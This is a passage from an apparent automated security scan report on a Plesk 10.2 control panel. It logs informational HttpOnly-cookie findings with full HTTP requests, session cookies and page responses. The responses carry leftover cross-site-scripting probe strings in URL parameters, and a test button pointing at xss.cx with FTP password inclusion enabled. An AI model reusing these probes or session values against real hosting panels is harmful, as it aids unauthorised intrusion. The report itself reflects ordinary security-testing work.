<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.11. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@3/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/custom-button@3/properties/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/custom-buttons/custom-button@3/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/custom-buttons/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:20:50 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:20:51 GMT
Connection: close
Content-Length: 17813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fcustom-buttons%252F%26src%3D%252Fsmb%252Faccount%26srcController%3DAccountController7bea8%25253c%25252fScRiPt%252520%25253ef9cde00af98' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Settings of a Link to an Additional Service</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/custom_button_client_edit/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/custom-buttons/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

           function update_oC(f)
           {
               f.cmd.value = "update";
               lsubmit(f);
               return false;
           }

           function place_oC(f)
           {
       f.inc_bit_1.disabled = !(("domain" == f.place.value))
f.inc_bit_32.disabled = !(("domain" == f.place.value))
f.inc_bit_512.disabled = !(("domain" == f.place.value))
f.inc_bit_1024.disabled = !(("domain" == f.place.value))
f.inc_bit_2.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_4.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_8.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_16.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))

           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Links to additional services","href":"\/plesk\/client@2\/custom-buttons\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/custom-buttons/custom-button@3/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Custom button</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr >
   <td class="name"><label for="fid-text">Button label</label>&nbsp;<span class="required">*</span></td>
   <td><input type="text" name="text" id="fid-text" value="XSS.CX" size="40" maxlength="254"></td>
</tr>

<tr>
   <td class="name"><label for="fid-place">Location</label></td>
   <td><select name="place" id="fid-place" onChange="place_oC(document.forms[0])">    <option value='navigation'>Common Access</option>
   <option value='domain' SELECTED>Websites &amp; Domains page of Subscription</option>
   <option value='client'>Customer&#039;s Home page</option>
</select>
</td>
</tr>

<tr >
   <td class="name"><label for="fid-sort_key">Priority</label></td>
   <td><input type="text" name="sort_key" id="fid-sort_key" value="100" size="15" maxlength="14"></td>
</tr>

<tr >
   <td class="name"><label for="fid-fname">Background image</label></td>
   <td><input type="file" name="fname" id="fid-fname"></td>
</tr>

<tr >
   <td class="name"><label for="fid-url">URL</label>&nbsp;<span class="required">*</span></td>

   <td><input type="text" name="url" id="fid-url" value="http://xss.cx" size="40" maxlength="254"></td>

</tr>


<tr>
   <td class="name"><label for="fid-inc_bit_1">Include subscription ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1" id="fid-inc_bit_1" value="true" CHECKED > <label for="fid-inc_bit_1"><span class="hint">&amp;dom_id=&lt;dom_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_32">Include Primary Domain name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_32" id="fid-inc_bit_32" value="true" CHECKED > <label for="fid-inc_bit_32"><span class="hint">&amp;dom_name=&lt;dom_name&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_512">Include FTP username</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_512" id="fid-inc_bit_512" value="true" CHECKED > <label for="fid-inc_bit_512"><span class="hint">&amp;ftp_user=&lt;ftp_user&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_1024">Include FTP password</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1024" id="fid-inc_bit_1024" value="true" CHECKED > <label for="fid-inc_bit_1024"><span class="hint">&amp;ftp_pass=&lt;ftp_pass&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_2">Include customer ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_2" id="fid-inc_bit_2" value="true" CHECKED > <label for="fid-inc_bit_2"><span class="hint">&amp;cl_id=&lt;cl_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_4">Include customer's company name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_4" id="fid-inc_bit_4" value="true" CHECKED > <label for="fid-inc_bit_4"><span class="hint">&amp;cname=&lt;cname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_8">Include customer's contact name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_8" id="fid-inc_bit_8" value="true" CHECKED > <label for="fid-inc_bit_8"><span class="hint">&amp;pname=&lt;pname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_16">Include customer's e-mail</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_16" id="fid-inc_bit_16" value="true" CHECKED > <label for="fid-inc_bit_16"><span class="hint">&amp;email=&lt;email&gt;</span></label></td>
</tr>


<tr >
   <td class="name"><label for="fid-conhelp">Tooltip text</label>&nbsp;</td>
   <td><textarea name="conhelp" id="fid-conhelp" rows="11" style="font-size:10px; width:128px;" cols="50" rows="10">will it take xss?</TEXTAREA></td>
</tr>

<tr>
   <td class="name"><label for="fid-internal">Open URL in Parallels Panel</label></td>
   <td><input type="checkbox" class="checkbox" name="internal" id="fid-internal" value="true" ></td>
</tr>

<tr>
   <td class="name"><label for="fid-private">Show to me only</label></td>
   <td><input type="checkbox" class="checkbox" name="private" id="fid-private" value="true" CHECKED ></td>
</tr>

</table>

<input type="hidden" name="cb_id" value="3">

</td></tr></table></fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return update_oC(document.forms[0]);;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);return update_oC(document.forms[0]);;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.12. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@new/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/custom-button@new/properties/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/custom-buttons/custom-button@new/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/custom-buttons/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:19:08 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:19:08 GMT
Connection: close
Content-Length: 18025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/wizard.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Faccount%26srcController%3DAccountController%2500da28a%3C%2Fscript%3Eda6245b28ac' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Settings of a Link to an Additional Service</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/custom_button_client_edit/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/custom-buttons/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

           function update_oC(f)
           {
               f.cmd.value = "update";
               lsubmit(f);
               return false;
           }

           function place_oC(f)
           {
       f.inc_bit_1.disabled = !(("domain" == f.place.value))
f.inc_bit_32.disabled = !(("domain" == f.place.value))
f.inc_bit_512.disabled = !(("domain" == f.place.value))
f.inc_bit_1024.disabled = !(("domain" == f.place.value))
f.inc_bit_2.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_4.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_8.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_16.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))

           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/custom-buttons/custom-button@new/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Custom button</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr >
   <td class="name"><label for="fid-text">Button label</label>&nbsp;<span class="required">*</span></td>
   <td><input type="text" name="text" id="fid-text" value="" size="40" maxlength="254"></td>
</tr>

<tr>
   <td class="name"><label for="fid-place">Location</label></td>
   <td><select name="place" id="fid-place" onChange="place_oC(document.forms[0])">    <option value='navigation'>Common Access</option>
   <option value='domain' SELECTED>Websites &amp; Domains page of Subscription</option>
   <option value='client'>Customer&#039;s Home page</option>
</select>
</td>
</tr>

<tr >
   <td class="name"><label for="fid-sort_key">Priority</label></td>
   <td><input type="text" name="sort_key" id="fid-sort_key" value="100" size="15" maxlength="14"></td>
</tr>

<tr >
   <td class="name"><label for="fid-fname">Background image</label></td>
   <td><input type="file" name="fname" id="fid-fname"></td>
</tr>

<tr >
   <td class="name"><label for="fid-url">URL</label>&nbsp;<span class="required">*</span></td>

   <td><input type="text" name="url" id="fid-url" value="" size="40" maxlength="254"></td>

</tr>


<tr>
   <td class="name"><label for="fid-inc_bit_1">Include subscription ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1" id="fid-inc_bit_1" value="true" > <label for="fid-inc_bit_1"><span class="hint">&amp;dom_id=&lt;dom_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_32">Include Primary Domain name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_32" id="fid-inc_bit_32" value="true" > <label for="fid-inc_bit_32"><span class="hint">&amp;dom_name=&lt;dom_name&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_512">Include FTP username</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_512" id="fid-inc_bit_512" value="true" > <label for="fid-inc_bit_512"><span class="hint">&amp;ftp_user=&lt;ftp_user&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_1024">Include FTP password</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1024" id="fid-inc_bit_1024" value="true" > <label for="fid-inc_bit_1024"><span class="hint">&amp;ftp_pass=&lt;ftp_pass&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_2">Include customer ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_2" id="fid-inc_bit_2" value="true" > <label for="fid-inc_bit_2"><span class="hint">&amp;cl_id=&lt;cl_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_4">Include customer's company name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_4" id="fid-inc_bit_4" value="true" > <label for="fid-inc_bit_4"><span class="hint">&amp;cname=&lt;cname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_8">Include customer's contact name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_8" id="fid-inc_bit_8" value="true" > <label for="fid-inc_bit_8"><span class="hint">&amp;pname=&lt;pname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_16">Include customer's e-mail</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_16" id="fid-inc_bit_16" value="true" > <label for="fid-inc_bit_16"><span class="hint">&amp;email=&lt;email&gt;</span></label></td>
</tr>


<tr >
   <td class="name"><label for="fid-conhelp">Tooltip text</label>&nbsp;</td>
   <td><textarea name="conhelp" id="fid-conhelp" rows="11" style="font-size:10px; width:128px;" cols="50" rows="10"></TEXTAREA></td>
</tr>

<tr>
   <td class="name"><label for="fid-internal">Open URL in Parallels Panel</label></td>
